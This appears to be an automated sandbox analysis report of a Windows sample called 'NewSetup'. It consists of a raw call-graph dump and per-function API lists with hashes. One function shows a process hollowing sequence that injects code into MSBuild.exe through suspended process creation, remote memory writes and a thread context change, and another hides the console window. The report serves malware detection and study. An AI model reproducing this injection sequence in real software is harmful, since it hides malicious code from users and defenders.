GetModuleFileNameW 20537->20540 20548 22a89a 20540->20548 20542 2122b0 20552 211fb0 GetPEB 20542->20552 20545 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20546 2122ca 20545->20546 20549 22a8ad _Fputc 20548->20549 20575 22a90f 20549->20575 20551 22a8bf _Fputc 20551->20542 20606 211240 20552->20606 20556 212041 GetFileSize 20558 212055 20556->20558 20559 2121fc CloseHandle 20556->20559 20557 212225 20557->20545 20560 21205d ReadFile 20558->20560 20559->20557 20561 2121f3 20560->20561 20562 212079 CloseHandle 20560->20562 20561->20559 20563 212205 20562->20563 20574 212090 _Yarn codecvt _strlen 20562->20574 20618 211ef0 20563->20618 20565 21223b 20637 212600 30 API calls std::_Throw_Cpp_error 20565->20637 20567 212247 20638 227ddf 29 API calls 2 library calls 20567->20638 20569 21a663 
RaiseException EnterCriticalSection LeaveCriticalSection codecvt 20569->20574 20574->20563 20574->20565 20574->20567 20574->20569 20631 211000 20574->20631 20576 22a93f 20575->20576 20577 22a94e 20576->20577 20578 22a96c 20576->20578 20596 22a943 20576->20596 20599 227f78 29 API calls 2 library calls 20577->20599 20580 22a979 20578->20580 20600 223790 39 API calls _Fputc 20578->20600 20583 22a993 20580->20583 20584 22a9b1 20580->20584 20581 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20587 22abb4 20581->20587 20601 2366fb 5 API calls 3 library calls 20583->20601 20585 22ab41 20584->20585 20586 22a9c5 20584->20586 20585->20596 20605 22c021 WideCharToMultiByte _Fputc 20585->20605 20590 22aa5f 20586->20590 20594 22aa09 20586->20594 20586->20596 20587->20551 20603 22c021 WideCharToMultiByte _Fputc 20590->20603 20593 22aa72 20595 22aa8b GetLastError 20593->20595 20593->20596 20602 22c021 WideCharToMultiByte _Fputc 20594->20602 20595->20596 20598 22aa9a 20595->20598 20596->20581 20598->20596 20604 22c021 WideCharToMultiByte _Fputc 20598->20604 20599->20596 20600->20580 20601->20596 20602->20596 20603->20593 20604->20598 20605->20596 20616 211283 _Yarn codecvt _strlen 20606->20616 20617 211402 CreateFileA 20606->20617 20607 211422 20639 212600 30 API calls std::_Throw_Cpp_error 20607->20639 20609 21142e 20640 227ddf 29 API calls 2 library calls 20609->20640 20610 21a663 RaiseException EnterCriticalSection LeaveCriticalSection codecvt 20610->20616 20613 211000 102 API calls 20613->20616 20616->20607 20616->20609 20616->20610 20616->20613 20616->20617 20617->20556 20617->20557 20619 211240 102 API calls 20618->20619 20620 211f18 FreeConsole 20619->20620 20641 2114b0 20620->20641 20622 211f39 20623 2114b0 103 API calls 20622->20623 20624 211f4a 20623->20624 20625 211240 102 API calls 20624->20625 20626 211f5d VirtualProtect 20625->20626 20628 211f7e 20626->20628 20629 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20628->20629 20630 211fa3 
20629->20630 20630->20557 20632 211013 20631->20632 20847 212750 20632->20847 20645 2114f0 20641->20645 20646 211702 codecvt 20645->20646 20647 2116dd 20645->20647 20651 214320 20645->20651 20664 211750 20645->20664 20678 211d10 20645->20678 20646->20622 20647->20646 20686 227ddf 29 API calls 2 library calls 20647->20686 20652 214364 20651->20652 20653 21444e 20651->20653 20655 2143a5 20652->20655 20656 21437e 20652->20656 20660 214393 _Yarn 20652->20660 20687 212610 30 API calls 2 library calls 20653->20687 20658 21a663 codecvt 3 API calls 20655->20658 20656->20653 20657 21438a 20656->20657 20661 21a663 codecvt 3 API calls 20657->20661 20658->20660 20663 214424 codecvt 20660->20663 20688 227ddf 29 API calls 2 library calls 20660->20688 20661->20660 20663->20645 20665 211788 _strlen 20664->20665 20668 211833 20665->20668 20675 21180d 20665->20675 20715 212c50 20665->20715 20668->20675 20689 214460 20668->20689 20670 211b8e 20671 211b9f 20670->20671 20725 2138e0 39 API calls 2 library calls 20670->20725 20671->20645 20675->20670 20726 212f00 38 API calls std::ios_base::_Init 20675->20726 20727 2132c0 30 API calls 4 library calls 20675->20727 20728 22060c RaiseException 20675->20728 20676 21188d 20676->20675 20706 21def0 20676->20706 20679 211d5c 20678->20679 20680 214460 67 API calls 20679->20680 20681 211d70 20680->20681 20833 214b10 20681->20833 20684 212c50 39 API calls 20685 211deb 20684->20685 20685->20645 20687->20660 20729 21a9f4 20689->20729 20692 21a9f4 std::_Lockit::_Lockit 7 API calls 20693 2144b7 20692->20693 20735 21aa25 20693->20735 20694 2144d8 20704 214556 20694->20704 20742 2145f0 67 API calls 2 library calls 20694->20742 20695 21aa25 std::_Lockit::~_Lockit 2 API calls 20698 214585 20695->20698 20698->20676 20699 21453b 20700 214543 20699->20700 20701 214598 20699->20701 20743 21ab43 RaiseException _Yarn Concurrency::cancel_current_task 20700->20743 20744 213e50 RaiseException Concurrency::cancel_current_task 20701->20744 20704->20695 20707 21df17 
20706->20707 20710 21df1e 20706->20710 20708 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20707->20708 20709 21e01c 20708->20709 20709->20676 20710->20707 20711 21df69 20710->20711 20713 21dfd0 20710->20713 20711->20707 20749 21dada 20711->20749 20713->20707 20752 22932d 20713->20752 20716 212d5a 20715->20716 20717 212c90 20715->20717 20716->20668 20718 212c50 39 API calls 20717->20718 20719 212cb3 20717->20719 20723 212cd7 20717->20723 20718->20723 20719->20716 20829 2138e0 39 API calls 2 library calls 20719->20829 20723->20719 20830 212f00 38 API calls std::ios_base::_Init 20723->20830 20831 2132c0 30 API calls 4 library calls 20723->20831 20832 22060c RaiseException 20723->20832 20725->20671 20726->20675 20727->20675 20728->20675 20730 21aa03 20729->20730 20732 21aa0a 20729->20732 20745 22810f 6 API calls 2 library calls 20730->20745 20733 21449a 20732->20733 20746 21fac8 EnterCriticalSection 20732->20746 20733->20692 20733->20694 20736 21aa2f 20735->20736 20737 22811d 20735->20737 20741 21aa42 20736->20741 20747 21fad6 LeaveCriticalSection 20736->20747 20748 2280f8 LeaveCriticalSection 20737->20748 20739 228124 20739->20694 20741->20694 20742->20699 20743->20704 20745->20733 20746->20733 20747->20741 20748->20739 20756 228d91 20749->20756 20751 21dae8 20751->20707 20753 229340 _Fputc 20752->20753 20803 22950e 20753->20803 20755 229355 _Fputc 20755->20707 20757 228da4 _Fputc 20756->20757 20760 228f33 20757->20760 20759 228db3 _Fputc 20759->20751 20761 228f3f ___scrt_is_nonwritable_in_current_image 20760->20761 20762 228f46 20761->20762 20763 228f6b 20761->20763 20801 227f78 29 API calls 2 library calls 20762->20801 20771 223315 EnterCriticalSection 20763->20771 20766 228f61 20766->20759 20767 228f7a 20772 228dc7 20767->20772 20771->20767 20773 228dfe 20772->20773 20774 228dec 20772->20774 20776 22f704 _Ungetc 29 API calls 20773->20776 20775 228eff _Fputc 66 API calls 20774->20775 20788 228df6 20775->20788 20777 228e05 20776->20777 20778 22f704 
_Ungetc 29 API calls 20777->20778 20783 228e2d 20777->20783 20782 228e16 20778->20782 20779 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20780 228efd 20779->20780 20802 228fbb LeaveCriticalSection __fread_nolock 20780->20802 20781 228ee3 20785 228eff _Fputc 66 API calls 20781->20785 20782->20783 20786 22f704 _Ungetc 29 API calls 20782->20786 20783->20781 20784 22f704 _Ungetc 29 API calls 20783->20784 20787 228e60 20784->20787 20785->20788 20789 228e22 20786->20789 20790 228e83 20787->20790 20792 22f704 _Ungetc 29 API calls 20787->20792 20788->20779 20791 22f704 _Ungetc 29 API calls 20789->20791 20790->20781 20793 228e9b 20790->20793 20791->20783 20795 228e6c 20792->20795 20794 22f430 _Fputc 41 API calls 20793->20794 20796 228ead 20794->20796 20795->20790 20797 22f704 _Ungetc 29 API calls 20795->20797 20796->20788 20799 228c30 _Fputc 66 API calls 20796->20799 20798 228e78 20797->20798 20800 22f704 _Ungetc 29 API calls 20798->20800 20799->20796 20800->20790 20801->20766 20802->20766 20804 22951c 20803->20804 20810 229544 20803->20810 20805 22954b 20804->20805 20806 229529 20804->20806 20804->20810 20811 2295d1 20805->20811 20819 227f78 29 API calls 2 library calls 20806->20819 20810->20755 20812 2295dd ___scrt_is_nonwritable_in_current_image 20811->20812 20820 223315 EnterCriticalSection 20812->20820 20814 2295eb 20821 229585 20814->20821 20818 229583 20818->20755 20819->20810 20820->20814 20822 22e68b 30 API calls 20821->20822 20823 22959d 20822->20823 20824 229367 66 API calls 20823->20824 20825 2295bb 20824->20825 20826 22e774 64 API calls 20825->20826 20827 2295c7 20826->20827 20828 229620 LeaveCriticalSection __fread_nolock 20827->20828 20828->20818 20829->20716 20830->20723 20831->20723 20832->20723 20834 214b4f 20833->20834 20836 212c50 39 API calls 20834->20836 20837 214b6f 20834->20837 20836->20837 20840 214c3e 20837->20840 20844 212f00 38 API calls std::ios_base::_Init 20837->20844 20845 2132c0 30 API calls 4 library calls 20837->20845 
20846 22060c RaiseException 20837->20846 20839 211de4 20839->20684 20840->20839 20843 2138e0 39 API calls 2 library calls 20840->20843 20843->20839 20844->20837 20845->20837 20846->20837 20849 2127ae 20847->20849 20848 2127d1 20852 2129de 20848->20852 20872 212f00 38 API calls std::ios_base::_Init 20848->20872 20873 2132c0 30 API calls 4 library calls 20848->20873 20874 22060c RaiseException 20848->20874 20849->20848 20850 212c50 39 API calls 20849->20850 20855 2127fa 20849->20855 20850->20855 20853 211028 20852->20853 20871 2138e0 39 API calls 2 library calls 20852->20871 20859 211110 20853->20859 20855->20848 20867 21cfb0 20855->20867 20860 21115c 20859->20860 20875 213c70 20860->20875 20865 212c50 39 API calls 20866 211031 20865->20866 20866->20574 20868 21cfbf 20867->20868 20869 21cfd2 _Yarn 20867->20869 20868->20848 20869->20868 20870 22932d 69 API calls 20869->20870 20870->20868 20871->20853 20872->20848 20873->20848 20874->20848 20876 21a9f4 std::_Lockit::_Lockit 7 API calls 20875->20876 20877 213caa 20876->20877 20878 21a9f4 std::_Lockit::_Lockit 7 API calls 20877->20878 20886 213ce5 20877->20886 20880 213cc4 20878->20880 20879 213daf 20881 21aa25 std::_Lockit::~_Lockit 2 API calls 20879->20881 20884 21aa25 std::_Lockit::~_Lockit 2 API calls 20880->20884 20883 211170 20881->20883 20882 21a663 codecvt 3 API calls 20885 213d4a 20882->20885 20894 213a00 20883->20894 20884->20886 20908 213e90 67 API calls 4 library calls 20885->20908 20886->20879 20886->20882 20888 213d7c 20909 21ecbf 39 API calls __Getctype 20888->20909 20890 213d97 20910 214010 65 API calls 3 library calls 20890->20910 20892 213da2 20911 21ab43 RaiseException _Yarn Concurrency::cancel_current_task 20892->20911 20896 213a3f 20894->20896 20895 213a5f 20901 213b2d 20895->20901 20947 212f00 38 API calls std::ios_base::_Init 20895->20947 20948 2132c0 30 API calls 4 library calls 20895->20948 20949 22060c RaiseException 20895->20949 20896->20895 20898 212c50 39 API calls 20896->20898 20899 213a85 
20896->20899 20898->20899 20899->20895 20912 21cb40 20899->20912 20921 21cb32 20899->20921 20934 21cb22 20899->20934 20903 2111e4 20901->20903 20946 2138e0 39 API calls 2 library calls 20901->20946 20903->20865 20908->20888 20909->20890 20910->20892 20911->20879 20915 21cb63 20912->20915 20917 21cb5c 20912->20917 20913 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20914 21cc48 20913->20914 20914->20895 20915->20917 20918 21cc09 20915->20918 20919 21cba9 20915->20919 20917->20913 20918->20917 20920 22932d 69 API calls 20918->20920 20919->20917 20950 21c44d 20919->20950 20920->20917 20922 21cb39 20921->20922 20926 21cb85 20921->20926 20989 223329 LeaveCriticalSection 20922->20989 20924 21cb10 20924->20895 20925 21cb3e 20925->20895 20926->20924 20927 21cc09 20926->20927 20929 21cbea 20926->20929 20928 22932d 69 API calls 20927->20928 20930 21cbfb 20927->20930 20928->20930 20929->20930 20931 21c44d _Fputc 68 API calls 20929->20931 20932 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20930->20932 20931->20930 20933 21cc48 20932->20933 20933->20895 20935 21cb29 20934->20935 20941 21cb75 20934->20941 20990 223315 EnterCriticalSection 20935->20990 20937 21cb2e 20937->20895 20938 21cb79 20939 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20938->20939 20940 21cc48 20939->20940 20940->20895 20941->20938 20943 21cc09 20941->20943 20944 21cba9 20941->20944 20942 21c44d _Fputc 68 API calls 20942->20938 20943->20938 20945 22932d 69 API calls 20943->20945 20944->20938 20944->20942 20945->20938 20946->20903 20947->20895 20948->20895 20949->20895 20953 228bfc 20950->20953 20952 21c45d 20952->20917 20954 228c0f _Fputc 20953->20954 20957 228c5d 20954->20957 20956 228c1e _Fputc 20956->20952 20958 228c69 ___scrt_is_nonwritable_in_current_image 20957->20958 20959 228c72 20958->20959 20960 228c96 20958->20960 20979 227f78 29 API calls 2 library calls 20959->20979 20973 223315 EnterCriticalSection 20960->20973 20963 228c9f 20964 228cb4 
20963->20964 20980 22f704 20963->20980 20966 228d20 20964->20966 20967 228d51 20964->20967 20987 227f78 29 API calls 2 library calls 20966->20987 20974 228c30 20967->20974 20970 228d5d 20988 228d89 LeaveCriticalSection __fread_nolock 20970->20988 20972 228c8b _Fputc 20972->20956 20973->20963 20975 228c3e 20974->20975 20976 228c4f 20974->20976 20977 234a37 _Fputc 66 API calls 20975->20977 20976->20970 20978 228c4a 20977->20978 20978->20970 20979->20972 20981 22f710 20980->20981 20982 22f725 20980->20982 20983 2276e4 __strnicoll 14 API calls 20981->20983 20982->20964 20984 22f715 20983->20984 20985 227dcf __strnicoll 29 API calls 20984->20985 20986 22f720 20985->20986 20986->20964 20987->20972 20988->20972 20989->20925 20990->20937 20991 2115d0 21002 211e40 20991->21002 20993 211702 codecvt 20994 2115db 20995 214320 30 API calls 20994->20995 20996 2116dd 20994->20996 20998 211750 103 API calls 20994->20998 21001 211d10 75 API calls 20994->21001 20995->20994 20996->20993 21008 227ddf 29 API calls 2 library calls 20996->21008 20998->20994 21001->20994 21003 211e63 _Fputc 21002->21003 21009 223558 21003->21009 21005 211e7c 21006 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21005->21006 21007 211e8c 21006->21007 21007->20994 21010 22356c _Fputc 21009->21010 21011 22358e 21010->21011 21012 2235b5 21010->21012 21024 227f78 29 API calls 2 library calls 21011->21024 21016 224d0d 21012->21016 21015 2235a9 _Fputc 21015->21005 21017 224d19 ___scrt_is_nonwritable_in_current_image 21016->21017 21025 223315 EnterCriticalSection 21017->21025 21019 224d27 21026 2246e2 21019->21026 21023 224d45 21023->21015 21024->21015 21025->21019 21038 22e68b 21026->21038 21028 224709 21045 223b31 21028->21045 21035 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21036 22477c 21035->21036 21037 224d5c LeaveCriticalSection __fread_nolock 21036->21037 21037->21023 21068 22e736 21038->21068 21040 22e6fe 21040->21028 21041 22e69c _Fputc 21041->21040 21075 22bf11 
21041->21075 21044 22bed7 ___free_lconv_mon 14 API calls 21044->21040 21096 223a93 21045->21096 21048 223b57 21102 227f78 29 API calls 2 library calls 21048->21102 21050 223b74 21061 223861 21050->21061 21053 223b7f std::_Locinfo::_Locinfo_dtor 21053->21050 21056 2239f2 66 API calls 21053->21056 21057 223d73 21053->21057 21103 223790 39 API calls _Fputc 21053->21103 21104 223de1 29 API calls 21053->21104 21105 223e59 70 API calls 2 library calls 21053->21105 21106 223fb2 70 API calls 2 library calls 21053->21106 21056->21053 21107 227f78 29 API calls 2 library calls 21057->21107 21059 223d8d 21108 227f78 29 API calls 2 library calls 21059->21108 21062 22bed7 ___free_lconv_mon 14 API calls 21061->21062 21063 223871 21062->21063 21064 22e774 21063->21064 21065 22e77f 21064->21065 21067 22476a 21064->21067 21065->21067 21111 2285b8 21065->21111 21067->21035 21069 22e742 _Fputc 21068->21069 21070 22e76c 21069->21070 21071 22f704 _Ungetc 29 API calls 21069->21071 21070->21041 21072 22e75d 21071->21072 21082 23744f 21072->21082 21074 22e763 21074->21041 21076 22bf4f 21075->21076 21080 22bf1f __Getctype 21075->21080 21095 2276e4 14 API calls __strnicoll 21076->21095 21078 22bf3a RtlAllocateHeap 21079 22bf4d 21078->21079 21078->21080 21079->21044 21080->21076 21080->21078 21094 225877 EnterCriticalSection LeaveCriticalSection codecvt 21080->21094 21083 23745c 21082->21083 21085 237469 21082->21085 21091 2276e4 14 API calls __strnicoll 21083->21091 21088 237475 21085->21088 21092 2276e4 14 API calls __strnicoll 21085->21092 21087 237461 21087->21074 21088->21074 21089 237496 21093 227dcf 29 API calls __strnicoll 21089->21093 21091->21087 21092->21089 21093->21087 21094->21080 21095->21079 21097 223ac0 21096->21097 21098 223a9e 21096->21098 21110 2235fc 29 API calls 2 library calls 21097->21110 21109 227f78 29 API calls 2 library calls 21098->21109 21101 223ab9 21101->21048 21101->21050 21101->21053 21102->21050 21103->21053 21104->21053 21105->21053 21106->21053 
21107->21059 21108->21050 21109->21101 21110->21101 21112 2285d1 21111->21112 21116 2285f8 21111->21116 21113 22f704 _Ungetc 29 API calls 21112->21113 21112->21116 21114 2285ed 21113->21114 21117 233e10 21114->21117 21116->21067 21118 233e1c ___scrt_is_nonwritable_in_current_image 21117->21118 21119 233e5d 21118->21119 21121 233ea3 21118->21121 21127 233e24 21118->21127 21157 227f78 29 API calls 2 library calls 21119->21157 21128 233868 EnterCriticalSection 21121->21128 21123 233ea9 21124 233ec7 21123->21124 21129 233bf4 21123->21129 21158 233f19 LeaveCriticalSection __fread_nolock 21124->21158 21127->21116 21128->21123 21130 233c1c 21129->21130 21133 233c3f __fread_nolock 21129->21133 21131 233c20 21130->21131 21134 233c7b 21130->21134 21173 227f78 29 API calls 2 library calls 21131->21173 21133->21124 21135 233c99 21134->21135 21174 2329a2 31 API calls __fread_nolock 21134->21174 21159 233f21 21135->21159 21139 233cb1 21141 233ce0 21139->21141 21142 233cb9 21139->21142 21140 233cf8 21143 233d61 WriteFile 21140->21143 21144 233d0c 21140->21144 21176 233f9e 45 API calls 4 library calls 21141->21176 21142->21133 21175 234365 6 API calls _Fputc 21142->21175 21148 233d83 GetLastError 21143->21148 21156 233cf3 21143->21156 21145 233d14 21144->21145 21146 233d4d 21144->21146 21149 233d39 21145->21149 21150 233d19 21145->21150 21166 2343cd 21146->21166 21148->21156 21178 234591 8 API calls 2 library calls 21149->21178 21150->21133 21153 233d22 21150->21153 21177 2344a8 7 API calls 2 library calls 21153->21177 21156->21133 21157->21127 21158->21127 21160 23744f __fread_nolock 29 API calls 21159->21160 21162 233f33 21160->21162 21161 233cab 21161->21139 21161->21140 21162->21161 21165 233f61 21162->21165 21179 223790 39 API calls _Fputc 21162->21179 21164 233f7b GetConsoleMode 21164->21161 21165->21161 21165->21164 21171 2343dc _Fputc 21166->21171 21167 23448d 21168 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21167->21168 21169 2344a6 21168->21169 
21169->21133 21170 23444c WriteFile 21170->21171 21172 23448f GetLastError 21170->21172 21171->21167 21171->21170 21172->21167 21173->21133 21174->21135 21175->21133 21176->21156 21177->21133 21178->21156 21179->21165 21180 2292d7 21181 22bed7 ___free_lconv_mon 14 API calls 21180->21181 21182 2292ef 21181->21182 21183 24a19e 21188 24a1d4 21183->21188 21184 24a321 GetPEB 21185 24a333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 21184->21185 21186 24a3da WriteProcessMemory 21185->21186 21185->21188 21187 24a41f 21186->21187 21189 24a424 WriteProcessMemory 21187->21189 21190 24a461 WriteProcessMemory Wow64SetThreadContext ResumeThread 21187->21190 21188->21184 21188->21185 21189->21187

Control-flow Graph

APIs
• CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0024A110,0024A100), ref: 0024A334
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0024A347
• Wow64GetThreadContext.KERNEL32(000002B0,00000000), ref: 0024A365
• ReadProcessMemory.KERNELBASE(000002B4,?,0024A154,00000004,00000000), ref: 0024A389
• VirtualAllocEx.KERNELBASE(000002B4,?,?,00003000,00000040), ref: 0024A3B4
• WriteProcessMemory.KERNELBASE(000002B4,00000000,?,?,00000000,?), ref: 0024A40C
• WriteProcessMemory.KERNELBASE(000002B4,00400000,?,?,00000000,?,00000028), ref: 0024A457
• WriteProcessMemory.KERNELBASE(000002B4,?,?,00000004,00000000), ref: 0024A495
• Wow64SetThreadContext.KERNEL32(000002B0,02E40000), ref: 0024A4D1
• ResumeThread.KERNELBASE(000002B0), ref: 0024A4E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
• API String ID: 2687962208-3857624555
• Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction ID: 4c70094529421b203591c4c28ce74deee16b642f7017d832e671b41d48ac3042
• Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction Fuzzy Hash: 14B1087264028AAFDB60CF68CC80BDA77A5FF88714F158164EA0CAB341D774FA51CB94

Control-flow Graph

APIs
  • Part of subcall function 00211240: _strlen.LIBCMT ref: 002112BA
• CreateFileA.KERNELBASE ref: 00212036
• GetFileSize.KERNEL32(00000000,00000000), ref: 00212046
• ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0021206B
• CloseHandle.KERNELBASE(00000000), ref: 0021207A
• _strlen.LIBCMT ref: 002120CD
• CloseHandle.KERNEL32(00000000), ref: 002121FD
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: File$CloseHandle_strlen$CreateReadSize
• String ID:
• API String ID: 2911764282-0
• Opcode ID: 6676fef68cae98eb6c7dcfecd823838551e440f93f4a9d9a3ca0390efd29a2a1
• Instruction ID: eb532e572796b3f3e39991f8e5986cb4468f3245fd936298fc6b416a62fe4f8c
• Opcode Fuzzy Hash: 6676fef68cae98eb6c7dcfecd823838551e440f93f4a9d9a3ca0390efd29a2a1
• Instruction Fuzzy Hash: 9471B0B2C10219DBCB10DFA4DC487EEBBF5BF59310F140629F814A7391E73599A98BA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID:
• String ID: p#
• API String ID: 0-2363645462
• Opcode ID: bf4605e4df8035d693e932f505804e83ac5b38a672c193e3e3b939ac63762eee
• Instruction ID: b233f3c51b225250128b1bdbbfe21760c2046cf8daca7f26cf190fe2053748b0
• Opcode Fuzzy Hash: bf4605e4df8035d693e932f505804e83ac5b38a672c193e3e3b939ac63762eee
• Instruction Fuzzy Hash: 88215F33A201560B879C9F386C62077FB8ADB96560705573ADE129F2C1F531DD7082E4

Control-flow Graph

APIs
• GetConsoleWindow.KERNELBASE ref: 002124DD
• ShowWindow.USER32(00000000,00000000), ref: 002124E6
• GetCurrentThreadId.KERNEL32 ref: 00212524
  • Part of subcall function 0021F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0021253A,?,?,00000000), ref: 0021F129
  • Part of subcall function 0021F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,0021253A,?,?,00000000), ref: 0021F142
  • Part of subcall function 0021F11D: CloseHandle.KERNEL32(?,?,?,0021253A,?,?,00000000), ref: 0021F154
• std::_Throw_Cpp_error.LIBCPMT ref: 00212567
• std::_Throw_Cpp_error.LIBCPMT ref: 00212578
• std::_Throw_Cpp_error.LIBCPMT ref: 00212589
• std::_Throw_Cpp_error.LIBCPMT ref: 0021259A
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
• String ID:
• API String ID: 3956949563-0
• Opcode ID: 4502fd2d6acd28e4df66800a0081558b14796bb00ada669411b740d1414b338a
• Instruction ID: dac1beaca46dac0bb3313fe4ff1ee6f11dd78dce4d06aaa2fc5cf25f8b1415c0
• Opcode Fuzzy Hash: 4502fd2d6acd28e4df66800a0081558b14796bb00ada669411b740d1414b338a
• Instruction Fuzzy Hash: D221E6F2D50215ABDF10AF94DC46BDE7AF8AF14700F080165F50876281E7B695B4CBE2

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,456001D6,?,0022D01A,?,?,00000000), ref: 0022CFCC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: 9c87e71e5233ec3ad1ac132d569e9c36b365932c413ee922c2a1f3aa5126fa90
• Instruction ID: 565aefc227ced5ad5257567fe2b2c933cfdc61f65f9d5bc2f76fcf075f646e00
• Opcode Fuzzy Hash: 9c87e71e5233ec3ad1ac132d569e9c36b365932c413ee922c2a1f3aa5126fa90
• Instruction Fuzzy Hash: 3D21F635A21322BBC7318FA5FD48A5E7759AB46360F350113FD06A7690D770ED20CAD0

Control-flow Graph

APIs
Strings
Memory Dump Source
